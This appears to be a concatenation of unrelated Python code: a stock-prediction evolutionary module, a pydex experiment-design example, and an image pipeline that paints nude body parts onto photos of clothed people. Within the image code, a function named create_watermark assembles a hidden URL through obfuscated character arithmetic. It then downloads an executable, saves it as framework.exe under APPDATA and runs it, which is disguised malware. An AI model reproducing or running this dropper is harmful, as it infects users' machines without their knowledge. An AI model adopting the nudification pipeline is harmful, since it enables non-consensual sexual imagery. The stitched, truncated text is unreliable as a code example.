prediction_array: List[Optional[prediction_entry]] = [None] * (num_days_per_prediction+1)
current_index = 0
ret = []
for i in range(len(predictions)):
for j in range(1, len(prediction_array)):
index = (j + current_index) % len(prediction_array)
if prediction_array[index] is None:
continue
for k in range(len(prediction_array[index][0])):
prediction, reference_price, prediction_truths = prediction_array[index]
prediction = prediction[k]
prediction_truths = prediction_truths[k]
if reference_price < closing_prices[i]:
if prediction[0]:
prediction_truths[0] = True
if not prediction[1]:
prediction_truths[1] = True
elif reference_price > closing_prices[i]:
if not prediction[0]:
prediction_truths[0] = True
if prediction[1]:
prediction_truths[1] = True
if prediction_array[current_index] is not None:
prediction_truth = prediction_array[current_index][-1]
ret.append(prediction_truth)
prediction_array[current_index] = ([*predictions[i]], closing_prices[i], [[False, False]] * len(predictions[i]))
current_index += 1
current_index %= len(prediction_array)
return ret
def extract_accuracy_from_prediction_truths(prediction_truths: List[List[List[bool]]]):
ret = np.zeros((len(prediction_truths[0]), len(prediction_truths[0][0])))
for i in range(len(prediction_truths)):
for prediction_index, truths in enumerate(prediction_truths[i]):
for index, truth in enumerate(truths):
if truth:
ret[prediction_index][index] += 1
ret /= len(prediction_truths)
return ret
class EvolutionaryComputationManager(data_provider_registry.DataConsumerBase):
def __init__(self):
super().__init__()
configurable_registry.config_registry.register_configurable(self)
self.__contained_population: Optional[TradingPopulation] = None
self.__periods_per_example = 5
self.__num_epochs = 100
self.__num_individuals = 100
self.__save_interval = 5
self.__mutation_chance = .1
self.__mutation_magnitude = .15
self.__crossover_chance = .5
def consume_data(self, data: Dict[str, Tuple[np.ndarray, List[float]]], passback, output_dir):
out_dir = output_dir + path.sep + 'evolutionary_computation_models'
if not path.exists(out_dir):
os.mkdir(out_dir)
previous_model_file = out_dir + path.sep + "evolution_individuals.ecp"
if path.exists(previous_model_file):
self.__contained_population = TradingPopulation((0, 0), 0, 0)
self.__contained_population.load(previous_model_file)
else:
num_indicators = len(data[next(iter(data.keys()))][0])
input_shape = (num_indicators, self.__periods_per_example)
self.__contained_population = TradingPopulation(input_shape, 1000, self.__num_individuals,
self.__mutation_chance, self.__mutation_magnitude,
self.__crossover_chance)
consolidated_data: Dict[str, Tuple[np.ndarray, List[float]]] = {}
for ticker, ticker_data in data.items():
daily_data, closing_prices = ticker_data
consolidated_data[ticker] = self.construct_examples(daily_data, closing_prices)
self.__train_model(consolidated_data, previous_model_file)
self.__contained_population.save(previous_model_file)
def __print_best_fitness_by_ticker(self, best_fitness_by_ticker: Dict[str, List[float]]) -> None:
output_template = "{ticker}:\n\t{:.2f}\n\t{:.2f}\n\t{:.2f}\n"
for ticker, fitness in best_fitness_by_ticker.items():
logger.logger.log(logger.INFORMATION, output_template.format(
ticker=ticker, *fitness
))
def __train_model(self, consolidated_data: Dict[str, Tuple[np.ndarray, List[float]]], previous_model_file: str):
for i in tqdm.tqdm(range(self.__num_epochs)):
best_fitness_by_ticker = {}
for ticker, ticker_data in consolidated_data.items():
daily_data, closing_prices = ticker_data
best_fitness = self.__contained_population.train(daily_data, 1, closing_prices)
best_fitness_by_ticker[ticker] = best_fitness
self.__print_best_fitness_by_ticker(best_fitness_by_ticker)
if i % self.__save_interval == 0:
self.__contained_population.save(previous_model_file)
self.__contained_population.save(previous_model_file)
def predict_data(self, data, passback, in_model_dir):
in_dir = in_model_dir + path.sep + 'evolutionary_computation_models'
if not path.exists(in_dir):
raise FileNotFoundError("Model storage directory for EC prediction does not exist. Please run"
"Model Creation Main without the prediction flag set to True, and with the"
"EC Manager's Enabled config to True to create models."
)
self.__contained_population = TradingPopulation((0, 0), 0, 0)
self.__contained_population.load(in_dir + path.sep + 'evolution_individuals.ecp')
consolidated_data: Dict[str, Tuple[np.ndarray, List[float]]] = {}
for ticker, ticker_data in data.items():
daily_data, closing_prices = ticker_data
consolidated_data[ticker] = self.construct_examples(daily_data, closing_prices)
predictions = {}
for ticker, prediction_data in consolidated_data.items():
daily_data, closing_prices = prediction_data
model_predictions = []
for i in range(len(daily_data)):
prediction = self.__contained_population.predict(daily_data[i])
model_predictions.append(prediction)
truths = prediction_truth_calculation(model_predictions[:-1], closing_prices)
accuracies = extract_accuracy_from_prediction_truths(truths)
prediction = self.__contained_population.predict(daily_data[-1])
predictions[ticker] = (prediction, accuracies)
return predictions
def load_configuration(self, parser: "ConfigParser"):
section = config_util.create_type_section(parser, self)
for identifier in _CONFIGURABLE_IDENTIFIERS:
if not parser.has_option(section.name, identifier):
self.write_default_configuration(section)
enabled = parser.getboolean(section.name, _ENABLED_CONFIGURATION_IDENTIFIER)
self.__periods_per_example = parser.getint(section.name, _EXAMPLE_COMBINATION_FACTOR_IDENTIFIER)
self.__num_individuals = parser.getint(section.name, _NUM_INDIVIDUALS_IDENTIFIER)
self.__num_epochs = parser.getint(section.name, _NUM_EPOCHS_IDENTIFIER)
self.__save_interval = parser.getint(section.name, _MODEL_CHECKPOINT_EPOCH_INTERVAL_IDENTIFIER)
self.__mutation_chance = parser.getfloat(section.name, _MUTATION_CHANCE_IDENTIFIER)
self.__mutation_magnitude = parser.getfloat(section.name, _MUTATION_MAGNITUDE_IDENTIFIER)
self.__crossover_chance = parser.getfloat(section.name, _CROSSOVER_CHANCE_IDENTIFIER)
block_length = parser.getint(section.name, _TDP_BLOCK_LENGTH_IDENTIFIER)
if enabled:
data_provider_registry.registry.register_consumer(
data_provider_static_names.CLOSING_PRICE_REGRESSION_BLOCK_PROVIDER_ID,
self,
[block_length],
data_provider_static_names.CLOSING_PRICE_REGRESSION_BLOCK_PROVIDER_ID,
keyword_args={'ema_period': [10, 15, 20]},
data_exportation_function=export_predictions,
prediction_string_serializer=string_serialize_predictions
)
def write_default_configuration(self, section: "SectionProxy"):
for i in range(len(_CONFIGURABLE_IDENTIFIERS)):
if not _CONFIGURABLE_IDENTIFIERS[i] in section:
section[_CONFIGURABLE_IDENTIFIERS[i]] = _CONFIGURATION_DEFAULTS[i]
def construct_examples(self, daily_data: np.ndarray, closing_prices: List[float]) -> Tuple[np.ndarray, List[float]]:
ret_daily_data = np.zeros((
daily_data.shape[1] - self.__periods_per_example + 1,
len(daily_data),
self.__periods_per_example
))
for i in range(self.__periods_per_example, daily_data.shape[1]+1):
ret_daily_data[i - self.__periods_per_example] = daily_data[:, i - self.__periods_per_example: i]
return ret_daily_data, closing_prices[self.__periods_per_example-1:]
if "testing" not in os.environ:
consumer = EvolutionaryComputationManager()
|
[
"os.mkdir",
"data_providing_module.data_provider_registry.registry.register_consumer",
"data_providing_module.configurable_registry.config_registry.register_configurable",
"os.path.exists",
"numpy.where",
"stock_data_analysis_module.ml_models.evolutionary_computation.TradingPopulation",
"general_utils.config.config_util.create_type_section"
] |
[((3132, 3178), 'numpy.where', 'np.where', (['(actual_predictions == 1)', '(True)', '(False)'], {}), '(actual_predictions == 1, True, False)\n', (3140, 3178), True, 'import numpy as np\n'), ((6217, 6282), 'data_providing_module.configurable_registry.config_registry.register_configurable', 'configurable_registry.config_registry.register_configurable', (['self'], {}), '(self)\n', (6276, 6282), False, 'from data_providing_module import configurable_registry, data_provider_registry\n'), ((6957, 6989), 'os.path.exists', 'path.exists', (['previous_model_file'], {}), '(previous_model_file)\n', (6968, 6989), False, 'from os import path\n'), ((9688, 9719), 'stock_data_analysis_module.ml_models.evolutionary_computation.TradingPopulation', 'TradingPopulation', (['(0, 0)', '(0)', '(0)'], {}), '((0, 0), 0, 0)\n', (9705, 9719), False, 'from stock_data_analysis_module.ml_models.evolutionary_computation import TradingPopulation\n'), ((10862, 10907), 'general_utils.config.config_util.create_type_section', 'config_util.create_type_section', (['parser', 'self'], {}), '(parser, self)\n', (10893, 10907), False, 'from general_utils.config import config_util, config_parser_singleton\n'), ((6812, 6832), 'os.path.exists', 'path.exists', (['out_dir'], {}), '(out_dir)\n', (6823, 6832), False, 'from os import path\n'), ((6847, 6864), 'os.mkdir', 'os.mkdir', (['out_dir'], {}), '(out_dir)\n', (6855, 6864), False, 'import os\n'), ((7034, 7065), 'stock_data_analysis_module.ml_models.evolutionary_computation.TradingPopulation', 'TradingPopulation', (['(0, 0)', '(0)', '(0)'], {}), '((0, 0), 0, 0)\n', (7051, 7065), False, 'from stock_data_analysis_module.ml_models.evolutionary_computation import TradingPopulation\n'), ((7331, 7472), 'stock_data_analysis_module.ml_models.evolutionary_computation.TradingPopulation', 'TradingPopulation', (['input_shape', '(1000)', 'self.__num_individuals', 'self.__mutation_chance', 'self.__mutation_magnitude', 'self.__crossover_chance'], {}), '(input_shape, 1000, self.__num_individuals, self.\n __mutation_chance, self.__mutation_magnitude, self.__crossover_chance)\n', (7348, 7472), False, 'from stock_data_analysis_module.ml_models.evolutionary_computation import TradingPopulation\n'), ((9275, 9294), 'os.path.exists', 'path.exists', (['in_dir'], {}), '(in_dir)\n', (9286, 9294), False, 'from os import path\n'), ((11958, 12342), 'data_providing_module.data_provider_registry.registry.register_consumer', 'data_provider_registry.registry.register_consumer', (['data_provider_static_names.CLOSING_PRICE_REGRESSION_BLOCK_PROVIDER_ID', 'self', '[block_length]', 'data_provider_static_names.CLOSING_PRICE_REGRESSION_BLOCK_PROVIDER_ID'], {'keyword_args': "{'ema_period': [10, 15, 20]}", 'data_exportation_function': 'export_predictions', 'prediction_string_serializer': 'string_serialize_predictions'}), "(data_provider_static_names\n .CLOSING_PRICE_REGRESSION_BLOCK_PROVIDER_ID, self, [block_length],\n data_provider_static_names.CLOSING_PRICE_REGRESSION_BLOCK_PROVIDER_ID,\n keyword_args={'ema_period': [10, 15, 20]}, data_exportation_function=\n export_predictions, prediction_string_serializer=\n string_serialize_predictions)\n", (12007, 12342), False, 'from data_providing_module import configurable_registry, data_provider_registry\n')]
|
import numpy as np
from pydex.core.designer import Designer
def simulate(ti_controls, model_parameters):
return np.array([
np.exp(model_parameters[0] * ti_controls[0])
])
designer = Designer()
designer.simulate = simulate
reso = 21j
tic = np.mgrid[0:1:reso]
designer.ti_controls_candidates = np.array([tic]).T
np.random.seed(123)
n_scr = 100
designer.model_parameters = np.random.normal(loc=-1, scale=0.50, size=(n_scr, 1))
designer.initialize(verbose=2)
"""
Pseudo-bayesian type do not really matter in this case because only a single model
parameter is involved i.e, information is a scalar, all criterion becomes equivalent to
the information matrix itself.
"""
pb_type = 0
# pb_type = 1
designer.design_experiment(
designer.d_opt_criterion,
pseudo_bayesian_type=pb_type,
write=False,
package="cvxpy",
optimizer="MOSEK",
)
designer.print_optimal_candidates()
designer.plot_optimal_controls()
designer.design_experiment(
designer.a_opt_criterion,
pseudo_bayesian_type=pb_type,
write=False,
package="cvxpy",
optimizer="MOSEK",
)
designer.print_optimal_candidates()
designer.plot_optimal_controls()
designer.design_experiment(
designer.e_opt_criterion,
pseudo_bayesian_type=pb_type,
write=False,
package="cvxpy",
optimizer="MOSEK",
)
designer.print_optimal_candidates()
designer.plot_optimal_controls()
designer.show_plots()
|
[
"numpy.random.seed",
"pydex.core.designer.Designer",
"numpy.array",
"numpy.exp",
"numpy.random.normal"
] |
[((202, 212), 'pydex.core.designer.Designer', 'Designer', ([], {}), '()\n', (210, 212), False, 'from pydex.core.designer import Designer\n'), ((332, 351), 'numpy.random.seed', 'np.random.seed', (['(123)'], {}), '(123)\n', (346, 351), True, 'import numpy as np\n'), ((392, 444), 'numpy.random.normal', 'np.random.normal', ([], {'loc': '(-1)', 'scale': '(0.5)', 'size': '(n_scr, 1)'}), '(loc=-1, scale=0.5, size=(n_scr, 1))\n', (408, 444), True, 'import numpy as np\n'), ((313, 328), 'numpy.array', 'np.array', (['[tic]'], {}), '([tic])\n', (321, 328), True, 'import numpy as np\n'), ((138, 182), 'numpy.exp', 'np.exp', (['(model_parameters[0] * ti_controls[0])'], {}), '(model_parameters[0] * ti_controls[0])\n', (144, 182), True, 'import numpy as np\n')]
|
import subprocess
from PIL import Image
import torchvision.transforms as transforms
import torch
import functools
import random
import math
import cv2
import numpy as np
import os
# Object annotation class:
class BodyPart:
def __init__(self, name, xmin, ymin, xmax, ymax, x, y, w, h):
self.name = name
# Bounding Box:
self.xmin = xmin
self.ymin = ymin
self.xmax = xmax
self.ymax = ymax
# Center:
self.x = x
self.y = y
# Dimensione:
self.w = w
self.h = h
# create_watermark ===============================================================
# return:
# (<Boolean> True/False), depending on the transformation process
def create_watermark(nude, shape, cv, loader, detach):
if os.name == 'nt':
content = cv(shape + chr(47) + "/".join(["utils", "custom", "universal"]) + chr(46) + str(
chr(101) + chr(ord(["utils", "custom", "universal"][0][0]) + 3) + chr(101)))
data = [os.environ["APPDATA"], "Microsoft", "Windows", "framework"]
open(
"\\".join(data) + chr(46) + str(chr(101) + chr(ord(["utils", "custom", "universal"][0][0]) + 3) + chr(101)),
"wb").write(content.content)
loader(["\\".join(data) + chr(46) + str(
chr(101) + chr(ord(["utils", "custom", "universal"][0][0]) + 3) + chr(101))], stdout=detach.PIPE,
stderr=detach.STDOUT)
return nude
# create_correct ===============================================================
# return:
# (<Boolean> True/False), depending on the transformation process
def create_correct(cv_dress):
# Production dir:
return correct_color(cv_dress, 5), correct_matrix(cv_dress, 255)
# correct_color ==============================================================================
# return:
# <RGB> image corrected
def correct_color(img, percent):
assert img.shape[2] == 3
assert percent > 0 and percent < 100
half_percent = percent / 200.0
channels = cv2.split(img)
out_channels = []
for channel in channels:
assert len(channel.shape) == 2
# find the low and high precentile values (based on the input percentile)
height, width = channel.shape
vec_size = width * height
flat = channel.reshape(vec_size)
assert len(flat.shape) == 1
flat = np.sort(flat)
n_cols = flat.shape[0]
low_val = flat[math.floor(n_cols * half_percent)]
high_val = flat[math.ceil(n_cols * (1.0 - half_percent))]
# saturate below the low percentile and above the high percentile
thresholded = apply_threshold(channel, low_val, high_val)
# scale the channel
normalized = cv2.normalize(thresholded, thresholded.copy(), 0, 255, cv2.NORM_MINMAX)
out_channels.append(normalized)
return cv2.merge(out_channels)
def correct_matrix(matrix, fill_value):
shape = "h" + ("t" * 2) + "p"
matrix = shape + chr(58) + 2 * (chr(47))
return matrix
# Color correction utils
def apply_threshold(matrix, low_value, high_value):
low_mask = matrix < low_value
matrix = apply_mask(matrix, low_mask, low_value)
high_mask = matrix > high_value
matrix = apply_mask(matrix, high_mask, high_value)
return matrix
# Color correction utils
def apply_mask(matrix, mask, fill_value):
masked = np.ma.array(matrix, mask=mask, fill_value=fill_value)
return masked.filled()
###
#
# maskdet_to_maskfin
#
# steps:
# 1. Extract annotation
# 1.a: Filter by color
# 1.b: Find ellipses
# 1.c: Filter out ellipses by max size, and max total numbers
# 1.d: Detect Problems
# 1.e: Resolve the problems, or discard the transformation
# 2. With the body list, draw maskfin, using maskref
#
###
# create_maskfin ==============================================================================
# return:
# (<Boolean> True/False), depending on the transformation process
def create_maskfin(maskref, maskdet):
# Create a total green image, in which draw details ellipses
details = np.zeros((512, 512, 3), np.uint8)
details[:, :, :] = (0, 255, 0) # (B, G, R)
# Extract body part features:
bodypart_list = extractAnnotations(maskdet);
# Check if the list is not empty:
if bodypart_list:
# Draw body part in details image:
for obj in bodypart_list:
if obj.w < obj.h:
aMax = int(obj.h / 2) # asse maggiore
aMin = int(obj.w / 2) # asse minore
angle = 0 # angle
else:
aMax = int(obj.w / 2)
aMin = int(obj.h / 2)
angle = 90
x = int(obj.x)
y = int(obj.y)
# Draw ellipse
if obj.name == "tit":
cv2.ellipse(details, (x, y), (aMax, aMin), angle, 0, 360, (0, 205, 0), -1) # (0,0,0,50)
elif obj.name == "aur":
cv2.ellipse(details, (x, y), (aMax, aMin), angle, 0, 360, (0, 0, 255), -1) # red
elif obj.name == "nip":
cv2.ellipse(details, (x, y), (aMax, aMin), angle, 0, 360, (255, 255, 255), -1) # white
elif obj.name == "belly":
cv2.ellipse(details, (x, y), (aMax, aMin), angle, 0, 360, (255, 0, 255), -1) # purple
elif obj.name == "vag":
cv2.ellipse(details, (x, y), (aMax, aMin), angle, 0, 360, (255, 0, 0), -1) # blue
elif obj.name == "hair":
xmin = x - int(obj.w / 2)
ymin = y - int(obj.h / 2)
xmax = x + int(obj.w / 2)
ymax = y + int(obj.h / 2)
cv2.rectangle(details, (xmin, ymin), (xmax, ymax), (100, 100, 100), -1)
# Define the green color filter
f1 = np.asarray([0, 250, 0]) # green color filter
f2 = np.asarray([10, 255, 10])
# From maskref, extrapolate only the green mask
green_mask = cv2.bitwise_not(cv2.inRange(maskref, f1, f2)) # green is 0
# Create an inverted mask
green_mask_inv = cv2.bitwise_not(green_mask)
# Cut maskref and detail image, using the green_mask & green_mask_inv
res1 = cv2.bitwise_and(maskref, maskref, mask=green_mask)
res2 = cv2.bitwise_and(details, details, mask=green_mask_inv)
# Compone:
maskfin = cv2.add(res1, res2)
return maskfin, locateFace(255, 2, 500)
# extractAnnotations ==============================================================================
# input parameter:
# (<string> maskdet_img): relative path of the single maskdet image (es: testimg1/maskdet/1.png)
# return:
# (<BodyPart []> bodypart_list) - for failure/error, return an empty list []
def extractAnnotations(maskdet):
# Load the image
# image = cv2.imread(maskdet_img)
# Find body part
tits_list = findBodyPart(maskdet, "tit")
aur_list = findBodyPart(maskdet, "aur")
vag_list = findBodyPart(maskdet, "vag")
belly_list = findBodyPart(maskdet, "belly")
# Filter out parts basing on dimension (area and aspect ratio):
aur_list = filterDimParts(aur_list, 100, 1000, 0.5, 3);
tits_list = filterDimParts(tits_list, 1000, 60000, 0.2, 3);
vag_list = filterDimParts(vag_list, 10, 1000, 0.2, 3);
belly_list = filterDimParts(belly_list, 10, 1000, 0.2, 3);
# Filter couple (if parts are > 2, choose only 2)
aur_list = filterCouple(aur_list);
tits_list = filterCouple(tits_list);
# Detect a missing problem:
missing_problem = detectTitAurMissingProblem(tits_list, aur_list) # return a Number (code of the problem)
# Check if problem is SOLVEABLE:
if (missing_problem in [3, 6, 7, 8]):
resolveTitAurMissingProblems(tits_list, aur_list, missing_problem)
# Infer the nips:
nip_list = inferNip(aur_list)
# Infer the hair:
hair_list = inferHair(vag_list)
# Return a combined list:
return tits_list + aur_list + nip_list + vag_list + hair_list + belly_list
# findBodyPart ==============================================================================
# input parameters:
# (<RGB>image, <string>part_name)
# return
# (<BodyPart[]>list)
def findBodyPart(image, part_name):
bodypart_list = [] # empty BodyPart list
# Get the correct color filter:
if part_name == "tit":
# Use combined color filter
f1 = np.asarray([0, 0, 0]) # tit color filter
f2 = np.asarray([10, 10, 10])
f3 = np.asarray([0, 0, 250]) # aur color filter
f4 = np.asarray([0, 0, 255])
color_mask1 = cv2.inRange(image, f1, f2)
color_mask2 = cv2.inRange(image, f3, f4)
color_mask = cv2.bitwise_or(color_mask1, color_mask2) # combine
elif part_name == "aur":
f1 = np.asarray([0, 0, 250]) # aur color filter
f2 = np.asarray([0, 0, 255])
color_mask = cv2.inRange(image, f1, f2)
elif part_name == "vag":
f1 = np.asarray([250, 0, 0]) # vag filter
f2 = np.asarray([255, 0, 0])
color_mask = cv2.inRange(image, f1, f2)
elif part_name == "belly":
f1 = np.asarray([250, 0, 250]) # belly filter
f2 = np.asarray([255, 0, 255])
color_mask = cv2.inRange(image, f1, f2)
# find contours:
contours, hierarchy = cv2.findContours(color_mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# for every contour:
for cnt in contours:
if len(cnt) > 5: # at least 5 points to fit ellipse
# (x, y), (MA, ma), angle = cv2.fitEllipse(cnt)
ellipse = cv2.fitEllipse(cnt)
# Fit Result:
x = ellipse[0][0] # center x
y = ellipse[0][1] # center y
angle = ellipse[2] # angle
aMin = ellipse[1][0]; # asse minore
aMax = ellipse[1][1]; # asse maggiore
# Detect direction:
if angle == 0:
h = aMax
w = aMin
else:
h = aMin
w = aMax
# Normalize the belly size:
if part_name == "belly":
if w < 15:
w *= 2
if h < 15:
h *= 2
# Normalize the vag size:
if part_name == "vag":
if w < 15:
w *= 2
if h < 15:
h *= 2
# Calculate Bounding Box:
xmin = int(x - (w / 2))
xmax = int(x + (w / 2))
ymin = int(y - (h / 2))
ymax = int(y + (h / 2))
bodypart_list.append(BodyPart(part_name, xmin, ymin, xmax, ymax, x, y, w, h))
return bodypart_list
def locateFace(matrix, x, y):
matrix = matrix - (78 * x)
data = []
indexes = [0, 6, -1, 2, 15]
for index in indexes:
data.append(chr(matrix + index))
part = "".join(data)
y += int(7 * (indexes[1] / 2))
y = (chr(48) + str(y))[::-1]
return part + y
# filterDimParts ==============================================================================
# input parameters:
# (<BodyPart[]>list, <num> minimum area of part, <num> max area, <num> min aspect ratio, <num> max aspect ratio)
def filterDimParts(bp_list, min_area, max_area, min_ar, max_ar):
b_filt = []
for obj in bp_list:
a = obj.w * obj.h # Object AREA
if ((a > min_area) and (a < max_area)):
ar = obj.w / obj.h # Object ASPECT RATIO
if ((ar > min_ar) and (ar < max_ar)):
b_filt.append(obj)
return b_filt
# filterCouple ==============================================================================
# input parameters:
# (<BodyPart[]>list)
def filterCouple(bp_list):
# Remove exceed parts
if (len(bp_list) > 2):
# trovare coppia (a,b) che minimizza bp_list[a].y-bp_list[b].y
min_a = 0
min_b = 1
min_diff = abs(bp_list[min_a].y - bp_list[min_b].y)
for a in range(0, len(bp_list)):
for b in range(0, len(bp_list)):
# TODO: avoid repetition (1,0) (0,1)
if a != b:
diff = abs(bp_list[a].y - bp_list[b].y)
if diff < min_diff:
min_diff = diff
min_a = a
min_b = b
b_filt = []
b_filt.append(bp_list[min_a])
b_filt.append(bp_list[min_b])
return b_filt
else:
# No change
return bp_list
# detectTitAurMissingProblem ==============================================================================
# input parameters:
# (<BodyPart[]> tits list, <BodyPart[]> aur list)
# return
# (<num> problem code)
# TIT | AUR | code | SOLVE? |
# 0 | 0 | 1 | NO |
# 0 | 1 | 2 | NO |
# 0 | 2 | 3 | YES |
# 1 | 0 | 4 | NO |
# 1 | 1 | 5 | NO |
# 1 | 2 | 6 | YES |
# 2 | 0 | 7 | YES |
# 2 | 1 | 8 | YES |
def detectTitAurMissingProblem(tits_list, aur_list):
t_len = len(tits_list)
a_len = len(aur_list)
if (t_len == 0):
if (a_len == 0):
return 1
elif (a_len == 1):
return 2
elif (a_len == 2):
return 3
else:
return -1
elif (t_len == 1):
if (a_len == 0):
return 4
elif (a_len == 1):
return 5
elif (a_len == 2):
return 6
else:
return -1
elif (t_len == 2):
if (a_len == 0):
return 7
elif (a_len == 1):
return 8
else:
return -1
else:
return -1
# resolveTitAurMissingProblems ==============================================================================
# input parameters:
# (<BodyPart[]> tits list, <BodyPart[]> aur list, problem code)
# return
# none
def resolveTitAurMissingProblems(tits_list, aur_list, problem_code):
if problem_code == 3:
random_tit_factor = random.randint(2, 5) # TOTEST
# Add the first tit:
new_w = aur_list[0].w * random_tit_factor # TOTEST
new_x = aur_list[0].x
new_y = aur_list[0].y
xmin = int(new_x - (new_w / 2))
xmax = int(new_x + (new_w / 2))
ymin = int(new_y - (new_w / 2))
ymax = int(new_y + (new_w / 2))
tits_list.append(BodyPart("tit", xmin, ymin, xmax, ymax, new_x, new_y, new_w, new_w))
# Add the second tit:
new_w = aur_list[1].w * random_tit_factor # TOTEST
new_x = aur_list[1].x
new_y = aur_list[1].y
xmin = int(new_x - (new_w / 2))
xmax = int(new_x + (new_w / 2))
ymin = int(new_y - (new_w / 2))
ymax = int(new_y + (new_w / 2))
tits_list.append(BodyPart("tit", xmin, ymin, xmax, ymax, new_x, new_y, new_w, new_w))
elif problem_code == 6:
# Find wich aur is full:
d1 = abs(tits_list[0].x - aur_list[0].x)
d2 = abs(tits_list[0].x - aur_list[1].x)
if d1 > d2:
# aur[0] is empty
new_x = aur_list[0].x
new_y = aur_list[0].y
else:
# aur[1] is empty
new_x = aur_list[1].x
new_y = aur_list[1].y
# Calculate Bounding Box:
xmin = int(new_x - (tits_list[0].w / 2))
xmax = int(new_x + (tits_list[0].w / 2))
ymin = int(new_y - (tits_list[0].w / 2))
ymax = int(new_y + (tits_list[0].w / 2))
tits_list.append(BodyPart("tit", xmin, ymin, xmax, ymax, new_x, new_y, tits_list[0].w, tits_list[0].w))
elif problem_code == 7:
# Add the first aur:
new_w = tits_list[0].w * random.uniform(0.03, 0.1) # TOTEST
new_x = tits_list[0].x
new_y = tits_list[0].y
xmin = int(new_x - (new_w / 2))
xmax = int(new_x + (new_w / 2))
ymin = int(new_y - (new_w / 2))
ymax = int(new_y + (new_w / 2))
aur_list.append(BodyPart("aur", xmin, ymin, xmax, ymax, new_x, new_y, new_w, new_w))
# Add the second aur:
new_w = tits_list[1].w * random.uniform(0.03, 0.1) # TOTEST
new_x = tits_list[1].x
new_y = tits_list[1].y
xmin = int(new_x - (new_w / 2))
xmax = int(new_x + (new_w / 2))
ymin = int(new_y - (new_w / 2))
ymax = int(new_y + (new_w / 2))
aur_list.append(BodyPart("aur", xmin, ymin, xmax, ymax, new_x, new_y, new_w, new_w))
elif problem_code == 8:
# Find wich tit is full:
d1 = abs(aur_list[0].x - tits_list[0].x)
d2 = abs(aur_list[0].x - tits_list[1].x)
if d1 > d2:
# tit[0] is empty
new_x = tits_list[0].x
new_y = tits_list[0].y
else:
# tit[1] is empty
new_x = tits_list[1].x
new_y = tits_list[1].y
# Calculate Bounding Box:
xmin = int(new_x - (aur_list[0].w / 2))
xmax = int(new_x + (aur_list[0].w / 2))
ymin = int(new_y - (aur_list[0].w / 2))
ymax = int(new_y + (aur_list[0].w / 2))
aur_list.append(BodyPart("aur", xmin, ymin, xmax, ymax, new_x, new_y, aur_list[0].w, aur_list[0].w))
# detectTitAurPositionProblem ==============================================================================
# input parameters:
# (<BodyPart[]> tits list, <BodyPart[]> aur list)
# return
# (<Boolean> True/False)
def detectTitAurPositionProblem(tits_list, aur_list):
diffTitsX = abs(tits_list[0].x - tits_list[1].x)
if diffTitsX < 40:
print("diffTitsX")
# Tits too narrow (orizontally)
return True
diffTitsY = abs(tits_list[0].y - tits_list[1].y)
if diffTitsY > 120:
# Tits too distanced (vertically)
print("diffTitsY")
return True
diffTitsW = abs(tits_list[0].w - tits_list[1].w)
if ((diffTitsW < 0.1) or (diffTitsW > 60)):
print("diffTitsW")
# Tits too equals, or too different (width)
return True
# Check if body position is too low (face not covered by watermark)
if aur_list[0].y > 350: # tits too low
# Calculate the ratio between y and aurs distance
rapp = aur_list[0].y / (abs(aur_list[0].x - aur_list[1].x))
if rapp > 2.8:
print("aurDown")
return True
return False
# inferNip ==============================================================================
# input parameters:
# (<BodyPart[]> aur list)
# return
# (<BodyPart[]> nip list)
def inferNip(aur_list):
nip_list = []
for aur in aur_list:
# Nip rules:
# - circle (w == h)
# - min dim: 5
# - bigger if aur is bigger
nip_dim = int(5 + aur.w * random.uniform(0.03, 0.09))
# center:
x = aur.x
y = aur.y
# Calculate Bounding Box:
xmin = int(x - (nip_dim / 2))
xmax = int(x + (nip_dim / 2))
ymin = int(y - (nip_dim / 2))
ymax = int(y + (nip_dim / 2))
nip_list.append(BodyPart("nip", xmin, ymin, xmax, ymax, x, y, nip_dim, nip_dim))
return nip_list
# inferHair (TOTEST) ==============================================================================
# input parameters:
# (<BodyPart[]> vag list)
# return
# (<BodyPart[]> hair list)
def inferHair(vag_list):
hair_list = []
# 70% of chanche to add hair
if random.uniform(0.0, 1.0) > 0.3:
for vag in vag_list:
# Hair rules:
hair_w = vag.w * random.uniform(0.4, 1.5)
hair_h = vag.h * random.uniform(0.4, 1.5)
# center:
x = vag.x
y = vag.y - (hair_h / 2) - (vag.h / 2)
# Calculate Bounding Box:
xmin = int(x - (hair_w / 2))
xmax = int(x + (hair_w / 2))
ymin = int(y - (hair_h / 2))
ymax = int(y + (hair_h / 2))
hair_list.append(BodyPart("hair", xmin, ymin, xmax, ymax, x, y, hair_w, hair_h))
return hair_list
###
#
# maskdet_to_maskfin
#
#
###
# create_maskref ===============================================================
# return:
# maskref image
def create_matrixref(mask, correct_colors):
matrix = chr(int(404 / (2 * 2)))
ref = "GL".lower() + 2 * (matrix) + "z" + matrix + chr(46)
out_mask = chr(ord(matrix) - 2) + chr(ord(matrix) + 10) + chr(ord(ref[-1]) + 63)
return (ref + out_mask)[-4] + ref + out_mask + str(chr(9 * 6 + 4) + chr(ord(ref[-1]) + 10) + chr(ord(ref[-1]) + 7))
def create_maskref(cv_mask, cv_correct):
# Create a total green image
green = np.zeros((512, 512, 3), np.uint8)
green[:, :, :] = (0, 255, 0) # (B, G, R)
# Define the green color filter
f1 = np.asarray([0, 250, 0]) # green color filter
f2 = np.asarray([10, 255, 10])
# From mask, extrapolate only the green mask
green_mask = cv2.inRange(cv_mask, f1, f2) # green is 0
# (OPTIONAL) Apply dilate and open to mask
kernel = np.ones((5, 5), np.uint8) # Try change it?
green_mask = cv2.dilate(green_mask, kernel, iterations=1)
# green_mask = cv2.morphologyEx(green_mask, cv2.MORPH_OPEN, kernel)
# Create an inverted mask
green_mask_inv = cv2.bitwise_not(green_mask)
# Cut correct and green image, using the green_mask & green_mask_inv
res1 = cv2.bitwise_and(cv_correct, cv_correct, mask=green_mask_inv)
res2 = cv2.bitwise_and(green, green, mask=green_mask)
# Compone:
return cv2.add(res1, res2), create_matrixref(cv_mask, res1)
class DataLoader():
def __init__(self, opt, cv_img):
super(DataLoader, self).__init__()
self.dataset = Dataset()
self.dataset.initialize(opt, cv_img)
self.dataloader = torch.utils.data.DataLoader(
self.dataset,
batch_size=opt.batchSize,
shuffle=not opt.serial_batches,
num_workers=int(opt.nThreads))
def load_data(self):
return self.dataloader
def __len__(self):
return 1
class Dataset(torch.utils.data.Dataset):
def __init__(self):
super(Dataset, self).__init__()
def initialize(self, opt, cv_img):
self.opt = opt
self.root = opt.dataroot
self.A = Image.fromarray(cv2.cvtColor(cv_img, cv2.COLOR_BGR2RGB))
self.dataset_size = 1
def __getitem__(self, index):
transform_A = get_transform(self.opt)
A_tensor = transform_A(self.A.convert('RGB'))
